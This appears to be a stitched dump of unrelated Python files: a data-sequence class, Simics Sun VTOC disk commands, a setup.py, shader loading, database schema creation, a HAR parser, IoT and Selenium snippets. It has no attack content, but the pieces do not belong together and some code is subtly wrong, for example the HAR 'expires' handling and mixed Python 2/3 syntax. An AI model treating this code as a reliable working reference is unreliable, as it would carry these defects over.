super().__init__(None) # there is no source sequence for this as we get our input from a numpy split
self.split = split
self.nb_samples = None
self.sampler = sampler
self.sampler_iterator = None
self.transforms = transforms
self.use_advanced_indexing = use_advanced_indexing
# create a unique UID
if sample_uid_name is not None and sample_uid_name not in split:
split[sample_uid_name] = np.asarray(np.arange(len_batch(split)))
def subsample(self, nb_samples):
# get random indices
subsample_sample = sampler_trw.SamplerRandom(batch_size=nb_samples)
subsample_sample.initializer(self.split)
# extract the indices
indices = next(iter(subsample_sample))
subsampled_split = get_batch_n(
self.split,
len_batch(self.split),
indices,
self.transforms,
# use `use_advanced_indexing` so that we keep the types as close as possible to original
use_advanced_indexing=True
)
return SequenceArray(
subsampled_split,
copy.deepcopy(self.sampler),
transforms=self.transforms,
use_advanced_indexing=self.use_advanced_indexing
)
def subsample_uids(self, uids, uids_name, new_sampler=None):
uid_values = self.split.get(uids_name)
assert uid_values is not None, 'no UIDs with name={}'.format(uids_name)
# find the samples that are in `uids`
indices_to_keep = []
uids_set = set(uids)
for index, uid in enumerate(uid_values):
if uid in uids_set:
indices_to_keep.append(index)
# reorder the `indices_to_keep` following the `uids` ordering
uids_ordering = {uid: index for index, uid in enumerate(uids)}
kvp_index_ordering = []
for index in indices_to_keep:
uid = uid_values[index]
ordering = uids_ordering[uid]
kvp_index_ordering.append((index, ordering))
kvp_uids_ordering = sorted(kvp_index_ordering, key=lambda value: value[1])
indices_to_keep = [index for index, ordering in kvp_uids_ordering]
# extract the samples
subsampled_split = get_batch_n(
self.split,
len_batch(self.split),
indices_to_keep,
self.transforms,
# use `use_advanced_indexing` so that we keep the types as close as possible to original
use_advanced_indexing=True
)
if new_sampler is None:
new_sampler = copy.deepcopy(self.sampler)
else:
new_sampler = copy.deepcopy(new_sampler)
return SequenceArray(
subsampled_split,
new_sampler,
transforms=self.transforms,
use_advanced_indexing=self.use_advanced_indexing
)
def __iter__(self):
# make sure the sampler is copied so that we can have multiple iterators of the
# same sequence
return SequenceIteratorArray(self, copy.deepcopy(self.sampler))
def close(self):
pass
class SequenceIteratorArray(sequence.SequenceIterator):
"""
Iterate the elements of an :class:`trw.train.SequenceArray` sequence
Assumptions:
- underlying `base_sequence` doesn't change sizes while iterating
"""
def __init__(self, base_sequence, sampler):
super().__init__()
self.base_sequence = base_sequence
self.nb_samples = len_batch(self.base_sequence.split)
self.sampler = sampler
self.sampler.initializer(self.base_sequence.split)
self.sampler_iterator = iter(self.sampler)
def __next__(self):
indices = self.sampler_iterator.__next__()
        if not isinstance(indices, (np.ndarray, collections.abc.Sequence)):
indices = [indices]
return get_batch_n(
self.base_sequence.split,
self.nb_samples,
indices,
self.base_sequence.transforms,
self.base_sequence.use_advanced_indexing)
def close(self):
pass
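# Minimal usage sketch (synthetic split; key names are illustrative):
#   split = {'values': np.arange(10), 'targets': np.arange(10) % 2}
#   seq = SequenceArray(split, sampler=sampler_trw.SamplerRandom(batch_size=4))
#   for batch in seq:
#       ...  # dict with the same keys plus the 'sample_uid' column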
|
nilq/baby-python
|
python
|
from cli import *
#
# VTOC layout: (with unimportant fields removed)
#
# OFFSET SIZE NUM NAME
# 0 128 1 label
VTOC_VERSION = 128 # 128 4 1 version
# 132 8 1 volume name
VTOC_NUMPART = 140 # 140 2 1 number of partitions
VTOC_PART_S2 = 142 # 142 4 8 partition headers, section 2
# 2 bytes tag
# 2 bytes permission flag
# 174 2 1 <pad>
# 176 4 3 bootinfo
VTOC_SANITY = 188 # 188 4 1 sanity
# 192 4 10 <reserved>
# 232 4 8 partition timestamp
# 264 2 1 write reinstruct
# 266 2 1 read reinstruct
# 268 152 1 <pad>
VTOC_RPM = 420 # 420 2 1 rpm
VTOC_PHYS_CYL = 422 # 422 2 1 physical cylinders
VTOC_ALT_P_CYL = 424 # 424 2 1 alternates per cylinder
# 426 2 1 <obsolete>
# 428 2 1 <obsolete>
VTOC_INTRLV = 430 # 430 2 1 interleave
VTOC_DATA_CYL = 432 # 432 2 1 data cylinders
VTOC_ALT_CYL = 434 # 434 2 1 alt cylinders
VTOC_HEADS = 436 # 436 2 1 heads
VTOC_TRACKS = 438 # 438 2 1 sectors per track
# 440 2 1 <obsolete>
# 442 2 1 <obsolete>
VTOC_PART_S1 = 444 # 444 8 8 partition headers, section 1
# 4 bytes start cylinder
# 4 bytes number of blocks
VTOC_MAGIC = 508 # 508 2 1 magic = 0xDABE
VTOC_CHECKSUM = 510 # 510 2 1 checksum
tag_list = { 0 : "unused",
1 : "boot",
2 : "root",
3 : "swap",
4 : "usr",
5 : "backup",
7 : "var",
8 : "home",
130 : "Linux swap",
131 : "Linux" }
flag_list = { 0 : "RW",
1 : "unmountable",
2 : "RO" }
def get_tag_str(tag):
try:
return "(" + tag_list[tag] + ")"
    except KeyError:
return "(unknown)"
def get_flag_str(flag):
try:
return "(" + flag_list[flag] + ")"
    except KeyError:
return "(unknown)"
def calculate_checksum(vtoc):
chk = 0
for i in range(0, 510, 2):
chk ^= get_vtoc_int16(vtoc, i)
return chk
def get_vtoc_label(vtoc):
str = ""
for i in vtoc:
if i == 0:
return str
str += chr(i)
def set_vtoc_label(vtoc, str):
for i in range(0, len(str)):
vtoc[i] = ord(str[i])
for j in range(i + 1, 512):
vtoc[j] = 0
def get_vtoc_int16(vtoc, offset):
return (vtoc[offset] << 8) | vtoc[offset + 1]
def set_vtoc_int16(vtoc, offset, value):
vtoc[offset] = (value >> 8) & 0xff
vtoc[offset + 1] = value & 0xff
def get_vtoc_int32(vtoc, offset):
return (get_vtoc_int16(vtoc, offset) << 16) | get_vtoc_int16(vtoc, offset + 2)
def set_vtoc_int32(vtoc, offset, value):
set_vtoc_int16(vtoc, offset, (value >> 16) & 0xffff)
set_vtoc_int16(vtoc, offset + 2, value & 0xffff)
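# Minimal self-check sketch for the helpers above: the checksum covers the
# 255 big-endian 16-bit words before offset 510, so storing it at
# VTOC_CHECKSUM makes the buffer self-consistent (contents are illustrative).
def _vtoc_selftest():
    buf = [0] * 512
    set_vtoc_label(buf, "SELFTEST")
    set_vtoc_int16(buf, VTOC_MAGIC, 0xDABE)
    set_vtoc_int16(buf, VTOC_CHECKSUM, calculate_checksum(buf))
    assert calculate_checksum(buf) == get_vtoc_int16(buf, VTOC_CHECKSUM)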
def read_block(obj, offset):
if obj.classname == "scsi-disk":
return list(obj.sector_data[offset * 512])
elif obj.classname == "ide-disk":
block = []
for i in range(0, 512):
block.append(obj.image.byte_access[offset * 512 + i])
return block
else:
raise Exception, "Unknown disk type"
def write_block(obj, offset, block):
if obj.classname == "scsi-disk":
obj.sector_data[offset * 512] = block
elif obj.classname == "ide-disk":
for i in range(0, 512):
obj.image.byte_access[offset * 512 + i] = block[i]
else:
raise Exception, "Unknown disk type"
def print_partitions(obj, vtoc):
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
print "Partition Table:"
print "Number Tag Flag Start End Size"
for i in range(0, 8):
tag = get_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * i + 0)
flag = get_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * i + 2)
start = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * i + 0)
blocks = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * i + 4)
if blocks == 0:
continue
start *= heads * s_per_t
print " %d %d %-12s %d %-13s %9d %9d %9d" % (
i, tag, get_tag_str(tag), flag, get_flag_str(flag),
start, start + blocks - 1, blocks)
def print_sun_vtoc_cmd(obj):
vtoc = read_block(obj, 0)
if get_vtoc_int16(vtoc, VTOC_MAGIC) != 0xDABE:
print "This does not appear to be a Sun Disk."
print "The magic is %x, expected 0xDABE" % get_vtoc_int16(vtoc, VTOC_MAGIC)
print
return
data_cyl = get_vtoc_int16(vtoc, VTOC_DATA_CYL)
phys_cyl = get_vtoc_int16(vtoc, VTOC_PHYS_CYL)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
print
print " Label : %s" % get_vtoc_label(vtoc)
print " RPM : %s" % get_vtoc_int16(vtoc, VTOC_RPM)
print " Data cylinders : %d" % data_cyl
print " Alt cylinders : %d" % get_vtoc_int16(vtoc, VTOC_ALT_CYL)
print "Physical cylinders : %d" % phys_cyl
print " Heads : %d" % heads
print " Sectors per Track : %d" % s_per_t
print
print " Number of data blocks : %d" % (data_cyl * s_per_t * heads)
print
print_partitions(obj, vtoc)
num_part = get_vtoc_int16(vtoc, VTOC_NUMPART)
chk_sum = get_vtoc_int16(vtoc, VTOC_CHECKSUM)
if num_part != 8:
print
print "### Illegal number of partitions set (%d), only 8 supported" % num_part
if calculate_checksum(vtoc) != chk_sum:
print "### Incorrect checksum: %d. Expected: %d" % (chk_sum, calculate_checksum(vtoc))
print
def write_sun_vtoc_cmd(obj, C, H, S, quiet):
vtoc = [0] * 512
if -1 in [C, H, S] and [C, H, S] != [-1, -1, -1]:
print "Only Partial geometry specified."
SIM_command_has_problem()
return
alt = 2
if [C, H, S] != [-1, -1, -1]:
cyl = C - alt
heads = H
s_per_t = S
elif obj.classname == "scsi-disk":
print "No geometry specified for SCSI disk VTOC."
SIM_command_has_problem()
return
elif obj.classname == "ide-disk":
cyl = obj.disk_cylinders - alt
heads = obj.disk_heads
s_per_t = obj.disk_sectors_per_track
pass
else:
raise Exception, "Unknown disk type"
set_vtoc_label(vtoc, "SIMDISK cyl %d alt %d hd %d sec %d" % (cyl, alt, heads, s_per_t))
set_vtoc_int32(vtoc, VTOC_VERSION, 1)
set_vtoc_int16(vtoc, VTOC_MAGIC, 0xDABE)
set_vtoc_int16(vtoc, VTOC_DATA_CYL, cyl)
set_vtoc_int16(vtoc, VTOC_ALT_CYL, alt)
set_vtoc_int16(vtoc, VTOC_INTRLV, 1)
set_vtoc_int16(vtoc, VTOC_PHYS_CYL, cyl + alt)
set_vtoc_int16(vtoc, VTOC_HEADS, heads)
set_vtoc_int16(vtoc, VTOC_TRACKS, s_per_t)
set_vtoc_int16(vtoc, VTOC_NUMPART, 8)
set_vtoc_int16(vtoc, VTOC_RPM, 7200)
set_vtoc_int32(vtoc, VTOC_SANITY, 0x600ddeee)
# set checksum last!
set_vtoc_int16(vtoc, VTOC_CHECKSUM, calculate_checksum(vtoc))
write_block(obj, 0, tuple(vtoc))
# create the backup slice
write_sun_vtoc_partition_cmd(obj, 2, "backup", "unmountable", 0, cyl * heads * s_per_t, 1)
if not quiet and SIM_get_quiet() == 0:
print "New VTOC written to disk:"
print_sun_vtoc_cmd(obj)
def write_sun_vtoc_partition_cmd(obj, nbr, tag_str, flag_str, start, blocks, quiet):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
try:
tag = tag_list.keys()[tag_list.values().index(tag_str)]
    except ValueError:
print "Unknown tag type '%s'" % tag_str
print "Try one of:"
for i in tag_list.values():
print " " + i
print
return
try:
flag = flag_list.keys()[flag_list.values().index(flag_str)]
    except ValueError:
print "Unknown flag '%s'" % flag_str
print "Try one of:"
for i in flag_list.values():
print " " + i
print
return
vtoc = read_block(obj, 0)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
set_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * nbr + 0, tag)
set_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * nbr + 2, flag)
set_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 0, start / (heads * s_per_t))
set_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4, blocks)
# set checksum last!
set_vtoc_int16(vtoc, VTOC_CHECKSUM, calculate_checksum(vtoc))
write_block(obj, 0, tuple(vtoc))
if not quiet and SIM_get_quiet() == 0:
print_partitions(obj, vtoc)
print
def delete_sun_vtoc_partition_cmd(obj, nbr, quiet):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
vtoc = read_block(obj, 0)
set_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * nbr + 0, 0)
set_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4, 0)
# set checksum last!
set_vtoc_int16(vtoc, VTOC_CHECKSUM, calculate_checksum(vtoc))
write_block(obj, 0, tuple(vtoc))
if not quiet and SIM_get_quiet() == 0:
print_partitions(obj, vtoc)
print
def dump_sun_partition_cmd(obj, nbr, file):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
vtoc = read_block(obj, 0)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
start = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr) * heads * s_per_t
blocks = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4)
if blocks == 0:
print "No partition %d.\n" % nbr
return
print "Dumping partition %d. Start block %d. Size in blocks: %d" % (nbr, start, blocks)
    # index with a list, since Python's [] operator takes a single argument
try:
obj.image.dump[[file, start * 512, blocks * 512]]
except Exception, msg:
print "Failed getting a dump from the disk image."
print "Error message was: %s\n" % msg
return
print "Partition dumped successfully.\n"
def add_sun_partition_cmd(obj, nbr, file):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
vtoc = read_block(obj, 0)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
start = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr) * heads * s_per_t
blocks = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4)
if blocks == 0:
print "No partition %d.\n" % nbr
return
print "Adding partition %d. Start block %d. Size in blocks: %d" % (nbr, start, blocks)
    # index with a list, since Python's [] operator takes a single argument
files = obj.image.files
files += [[file, "ro", start * 512, blocks * 512]]
try:
obj.image.files = files
except Exception, msg:
print "Failed adding the diff file '%s' to image '%s'." % (file, obj.name)
print "Error message was: %s\n" % msg
return
print "Partition added.\n"
def tag_expander(string, obj):
return get_completions(string, tag_list.values())
def flag_expander(string, obj):
return get_completions(string, flag_list.values())
def create_sun_vtoc_commands(name):
new_command("print-sun-vtoc", print_sun_vtoc_cmd,
[],
alias = "",
type = "%s commands" % name,
short = "print the VTOC for a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'create-sun-vtoc-header',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-partition',
"<" + "%s" % name + '>.' + 'delete-sun-vtoc-partition'],
doc = """
Print the contents of the VTOC (volume table of contents) for a Sun
disk. This is similar to the Solaris 'prtvtoc' command.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="317")
new_command("create-sun-vtoc-header", write_sun_vtoc_cmd,
[arg(int_t, "C", "?", -1),
arg(int_t, "H", "?", -1),
arg(int_t, "S", "?", -1),
arg(flag_t, "-quiet")],
alias = "",
type = "%s commands" % name,
short = "write a new VTOC to a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-partition',
"<" + "%s" % name + '>.' + 'delete-sun-vtoc-partition'],
doc = """
Create and write a new VTOC to a Sun disk. The geometry information written is
taken from the configuration attribute 'geometry' of the disk, unless specified
with the <b>C</b>, <b>H</b> and <b>S</b> parameters. A new empty partition
table is also created, with only the standard 'backup' partition as number
2. <arg>-quiet</arg> makes the command silent in case of success.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="330")
new_command("create-sun-vtoc-partition", write_sun_vtoc_partition_cmd,
[arg(int_t, "number"),
arg(str_t, "tag", expander = tag_expander),
arg(str_t, "flag", expander = flag_expander),
arg(int_t, "start-block"),
arg(int_t, "num-blocks"),
arg(flag_t, "-quiet")],
alias = "",
type = "%s commands" % name,
short = "write partition data in the VTOC on a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-header',
"<" + "%s" % name + '>.' + 'delete-sun-vtoc-partition'],
doc = """
Write partition information to the VTOC on a Sun disk. This command does not
change the format of the disk, and it does not create any file system on the
partition. Only the 'Volume Table Of Contents' is modified. No checking is
performed to make sure that partitions do not overlap, or that they do not
exceed the disk size. <arg>-quiet</arg> makes the command silent in case of
success.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="349")
new_command("delete-sun-vtoc-partition", delete_sun_vtoc_partition_cmd,
[arg(int_t, "number"),
arg(flag_t, "-quiet")],
alias = "",
type = "%s commands" % name,
short = "delete partition data from the VTOC on a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-header',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-partition'],
doc = """
Delete the information in the VTOC on a Sun disk for the specified partition.
No other modification on the disk is performed. <arg>-quiet</arg> makes the
command silent in case of success.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="371")
new_command("dump-sun-partition", dump_sun_partition_cmd,
[arg(int_t, "number"), arg(filename_t(), "file")],
alias = "",
type = "%s commands" % name,
short = "write partition as a file",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'add-sun-partition'],
doc = """
Write all data from a Sun disk partition to the specified file in
raw format.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="387")
new_command("add-sun-partition", add_sun_partition_cmd,
[arg(int_t, "number"), arg(filename_t(), "file")],
alias = "",
type = "%s commands" % name,
short = "add partition from a file",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'dump-sun-partition'],
doc = """
Adds an image or diff as a sun partition to the current disk.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="399")
|
nilq/baby-python
|
python
|
import os
from pathlib import Path
from setuptools import find_packages, setup
def parse_req_file(fname, initial=None):
"""Reads requires.txt file generated by setuptools and outputs a
new/updated dict of extras as keys and corresponding lists of dependencies
as values.
The input file's contents are similar to a `ConfigParser` file, e.g.
pkg_1
pkg_2
pkg_3
[extras1]
pkg_4
pkg_5
[extras2]
pkg_6
pkg_7
"""
reqs = {} if initial is None else initial
cline = None
with open(fname, "r") as f:
for line in f.readlines():
line = line[:-1].strip()
if len(line) == 0:
continue
if line[0] == "[":
# Add new key for current extras (if missing in dict)
cline = line[1:-1]
if cline not in reqs:
reqs[cline] = []
else:
# Only keep dependencies from extras
if cline is not None:
reqs[cline].append(line)
return reqs
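# For example, a requires.txt containing
#   pkg_1
#   [dev]
#   pkg_4
# yields {"dev": ["pkg_4"]}: dependencies before the first [section]
# header are skipped, since `cline` is still None at that point.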
def get_version(fname):
"""Reads PKG-INFO file generated by setuptools and extracts the Version
number."""
res = "UNK"
with open(fname, "r") as f:
for line in f.readlines():
line = line[:-1]
if line.startswith("Version:"):
res = line.replace("Version:", "").strip()
break
if res in ["UNK", ""]:
raise ValueError(f"Missing Version number in {fname}")
return res
if __name__ == "__main__":
base_dir = os.path.abspath(os.path.dirname(Path(__file__)))
if not os.path.exists(
os.path.join(base_dir, "allenact.egg-info/dependency_links.txt")
):
# Build mode for sdist
os.chdir(os.path.join(base_dir, ".."))
with open(".VERSION", "r") as f:
__version__ = f.readline().strip()
# Extra dependencies for development (actually unnecessary)
extras = {
"dev": [
l.strip()
for l in open("dev_requirements.txt", "r").readlines()
if l.strip() != ""
]
}
else:
# Install mode from sdist
__version__ = get_version(os.path.join(base_dir, "allenact.egg-info/PKG-INFO"))
extras = parse_req_file(
os.path.join(base_dir, "allenact.egg-info/requires.txt")
)
setup(
name="allenact",
version=__version__,
description="AllenAct framework",
long_description=(
"AllenAct is a modular and flexible learning framework designed with"
" a focus on the unique requirements of Embodied-AI research."
),
classifiers=[
"Intended Audience :: Science/Research",
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
keywords=["reinforcement learning", "embodied-AI", "AI", "RL", "SLAM"],
url="https://github.com/allenai/allenact",
author="Allen Institute for Artificial Intelligence",
author_email="lucaw@allenai.org",
license="MIT",
packages=find_packages(include=["allenact", "allenact.*"]),
install_requires=[
"gym>=0.17.0,<0.18.0",
"torch>=1.6.0,!=1.8.0,<1.9.0",
"tensorboardx>=2.1",
"torchvision>=0.7.0,<0.10.0",
"setproctitle",
"moviepy>=1.0.3",
"filelock",
"numpy>=1.22.2",
"Pillow==9.0.1",
"matplotlib>=3.3.1",
"networkx==2.6",
"opencv-python",
"wheel>=0.36.2",
],
setup_requires=["pytest-runner"],
tests_require=["pytest", "pytest-cov", "compress_pickle"],
entry_points={"console_scripts": ["allenact=allenact.main:main"]},
extras_require=extras,
)
|
nilq/baby-python
|
python
|
import sys
from PyQt5 import QtWidgets
from gui import MainWindow
"""
Guitario, simple chord recognizer
All created MP4 files are stored in saved_accords directory
"""
if __name__ == '__main__':
print("Loading application!")
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName("Guitario")
app.setStyle("Fusion")
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
nilq/baby-python
|
python
|
from abc import ABC, abstractmethod
class MyAbstract(ABC):
def __init__(self):
pass
@abstractmethod
def doSomething(self):
pass
class MyClass1(MyAbstract):
def __init__(self):
pass
def doSomething(self):
print("abstract method")
def doSomethingElse(self):
print("abstract method 2")
c1 = MyClass1()
c1.doSomething()
c1.doSomethingElse()
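# Note: the base class itself cannot be instantiated; MyAbstract() would
# raise TypeError because doSomething has no implementation.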
|
nilq/baby-python
|
python
|
"""
Overrides the align-items value for specific flex items.
"""
from ..defaults import BREAKPOINTS, UP, DOWN, FULL, ONLY
from ...core import CssModule
vals = [
('fs', 'flex-start'),
('fe', 'flex-end'),
('c', 'center'),
('b', 'baseline'),
('s', 'stretch')
]
mdl = CssModule(
'Align self',
[FULL],
dynamic={'.as': ['align-self']},
values=vals,
docstring=__doc__
)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import sys
try:
import psycopg2
postgres = True
except ImportError:
import sqlite3
postgres = False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("You must supply the database name as the first argument")
sys.exit()
if postgres:
conn = psycopg2.connect(sys.argv[1])
c = conn.cursor()
c.execute("""CREATE TABLE admins
(
admin_id bigserial NOT NULL,
user_id integer NOT NULL,
level smallint NOT NULL DEFAULT 1,
CONSTRAINT admins_pkey PRIMARY KEY (admin_id),
CONSTRAINT admins_user_id_key UNIQUE (user_id)
);""")
c.execute("""CREATE TABLE posts_per_channel
(
post_id bigserial NOT NULL,
replyto_id integer,
channel_id integer NOT NULL,
message_id integer NOT NULL,
contenttype text,
contenttext text,
file_id text,
CONSTRAINT posts_per_channel_pkey PRIMARY KEY (post_id)
);""")
c.execute("""CREATE TABLE channels
(
channel_id bigserial NOT NULL,
channelname text NOT NULL,
channelurl text,
CONSTRAINT channels_pkey PRIMARY KEY (channel_id)
);""")
else:
conn = sqlite3.connect(sys.argv[1])
c = conn.cursor()
c.execute("""CREATE TABLE "channels" (
`channel_id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`channelname` TEXT NOT NULL,
`channelurl` TEXT NOT NULL UNIQUE
);""")
c.execute("""CREATE TABLE `posts_per_channel` (
`post_id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`replyto_id` INTEGER,
`channel_id` INTEGER NOT NULL,
`message_id` INTEGER NOT NULL,
`contenttype` TEXT NOT NULL,
`contenttext` TEXT NOT NULL,
`file_id` TEXT
);""")
c.execute("""CREATE TABLE `admins` (
`admin_id` INTEGER NOT NULL UNIQUE,
`user_id` INTEGER NOT NULL UNIQUE,
`level` INTEGER NOT NULL DEFAULT 1,
PRIMARY KEY(admin_id)
);""")
conn.commit()
conn.close()
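# Usage sketch (names are hypothetical): the single argument is either a
# psycopg2 DSN or an sqlite3 file path, depending on which driver imported.
#   python3 create_tables.py "dbname=bot user=postgres"
#   python3 create_tables.py bot.db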
|
nilq/baby-python
|
python
|
class Cache(object):
def __init__(self, j):
self.raw = j
if "beforeRequest" in self.raw:
self.before_request = CacheRequest(self.raw["beforeRequest"])
else:
self.before_request = None
if "afterRequest" in self.raw:
self.after_request = CacheRequest(self.raw["afterRequest"])
else:
self.after_request = None
if "comment" in self.raw:
self.comment = self.raw["comment"]
else:
self.comment = ''
class CacheRequest(object):
def __init__(self, j):
self.raw = j
if "expires" in self.raw:
self.expires = CacheRequest(self.raw["expires"])
else:
self.expires = None
self.last_access = self.raw["lastAccess"]
self.etag = self.raw["eTag"]
self.hit_count = self.raw["hitCount"]
if "comment" in self.raw:
self.comment = self.raw["comment"]
else:
self.comment = ''
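# Minimal usage sketch (the dict mirrors a HAR "cache" entry; field values
# are illustrative):
if __name__ == "__main__":
    entry = Cache({
        "beforeRequest": {
            "lastAccess": "2009-04-16T15:50:36",
            "eTag": "",
            "hitCount": 0,
        },
        "comment": "example entry",
    })
    print(entry.before_request.hit_count)  # -> 0
    print(entry.after_request)             # -> None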
|
nilq/baby-python
|
python
|
from OpenGL.GL import *
from OpenGL.GL.ARB import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
from OpenGL.GLUT.special import *
from OpenGL.GL.shaders import *
frame_count = 0
def pre_frame():
pass
def post_frame():
    global frame_count  # needed so += rebinds the module-level counter
    frame_count += 1
def disable_vsyc():
import glfw
glfw.swap_interval(0)
def enable_vsyc():
import glfw
glfw.swap_interval(1)
#return GLuint
def LoadShaders(vertex_file_path,fragment_file_path):
# Create the shaders
VertexShaderID = glCreateShader(GL_VERTEX_SHADER)
FragmentShaderID = glCreateShader(GL_FRAGMENT_SHADER)
# Read the Vertex Shader code from the file
VertexShaderCode = ""
with open(vertex_file_path,'r') as fr:
for line in fr:
VertexShaderCode += line
    # alternatively you could use fr.readlines() and then join into a single string
FragmentShaderCode = ""
with open(fragment_file_path,'r') as fr:
for line in fr:
FragmentShaderCode += line
    # alternatively you could use fr.readlines() and then join into a single string
# Compile Vertex Shader
print("Compiling shader: %s"%(vertex_file_path))
glShaderSource(VertexShaderID, VertexShaderCode)
glCompileShader(VertexShaderID)
# Check Vertex Shader
result = glGetShaderiv(VertexShaderID, GL_COMPILE_STATUS)
if not result:
raise RuntimeError(glGetShaderInfoLog(VertexShaderID))
# Compile Fragment Shader
print("Compiling shader: %s"%(fragment_file_path))
glShaderSource(FragmentShaderID,FragmentShaderCode)
glCompileShader(FragmentShaderID)
# Check Fragment Shader
    result = glGetShaderiv(FragmentShaderID, GL_COMPILE_STATUS)
if not result:
raise RuntimeError(glGetShaderInfoLog(FragmentShaderID))
# Link the program
print("Linking program")
ProgramID = glCreateProgram()
glAttachShader(ProgramID, VertexShaderID)
glAttachShader(ProgramID, FragmentShaderID)
glLinkProgram(ProgramID)
# Check the program
    result = glGetProgramiv(ProgramID, GL_LINK_STATUS)
    if not result:
        raise RuntimeError(glGetProgramInfoLog(ProgramID))
    glDeleteShader(VertexShaderID)
    glDeleteShader(FragmentShaderID)
    return ProgramID
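# Usage sketch (requires a current GL context created elsewhere, e.g. via
# GLUT or glfw; the shader file names are hypothetical):
#   program = LoadShaders("simple.vert", "simple.frag")
#   glUseProgram(program)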
|
nilq/baby-python
|
python
|
# Create your tasks here
from __future__ import absolute_import, unicode_literals
from celery import shared_task
"""
@shared_task
def hello():
print("It's a beautiful day in the neighborhood")
"""
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import logging
import lecoresdk
def handler(event, context):
it = lecoresdk.IoTData()
set_params = {"productKey": "YourProductKey",
"deviceName": "YourDeviceName",
"payload": {"LightSwitch":0}}
res = it.setThingProperties(set_params)
print(res)
get_params = {"productKey": "YourProductKey",
"deviceName": "YourDeviceName",
"payload": ["LightSwitch"]}
res = it.getThingProperties(get_params)
print(res)
pub_params = {"topic": "/topic/hello",
"payload": "hello world"}
it.publish(pub_params)
print("publish success")
get_params = {"payload": [{"home":"123"}]}
res = it.getThingsWithTags(get_params)
print(res)
get_params = {"productKey": "YourProductKey",
"deviceName": "YourDeviceName",
"service":"upgrade",
"payload": {"LightSwitch": 0}}
res = it.callThingService(get_params)
print(res)
return 'hello world'
|
nilq/baby-python
|
python
|
from pathlib import Path
from cgr_gwas_qc.exceptions import GtcMagicNumberError, GtcTruncatedFileError, GtcVersionError
from cgr_gwas_qc.parsers.illumina import GenotypeCalls
def validate(file_name: Path):
try:
# Illumina's parser has a bunch of different error checks, so I am just
# using those to validate the file. However, I will throw custom errors
# for clarity.
GenotypeCalls(file_name.as_posix())
except Exception as err:
if err.args[0] == "GTC format error: bad format identifier":
raise GtcMagicNumberError
elif err.args[0] == "Unsupported GTC File version":
raise GtcVersionError
elif err.args[0] == "GTC file is incomplete":
raise GtcTruncatedFileError
else:
raise err
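# Usage sketch (the path is hypothetical):
#   from pathlib import Path
#   try:
#       validate(Path("sample.gtc"))
#   except GtcMagicNumberError:
#       print("not a GTC file")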
|
nilq/baby-python
|
python
|
from selenium import webdriver
#import time
#import unittest
browser = webdriver.Chrome()
browser.get('http://localhost:8000')
#unittest.TestCase.assertTrue(browser.get('http://localhost:8000'),msg='OK!')
assert 'The install worked successfully!' in browser.title
print('pass!')
browser.quit()
|
nilq/baby-python
|
python
|
# Django imports
from django.shortcuts import render
from django.core.urlresolvers import reverse_lazy
from django.views import generic as django_generic
from django.http import HttpResponse
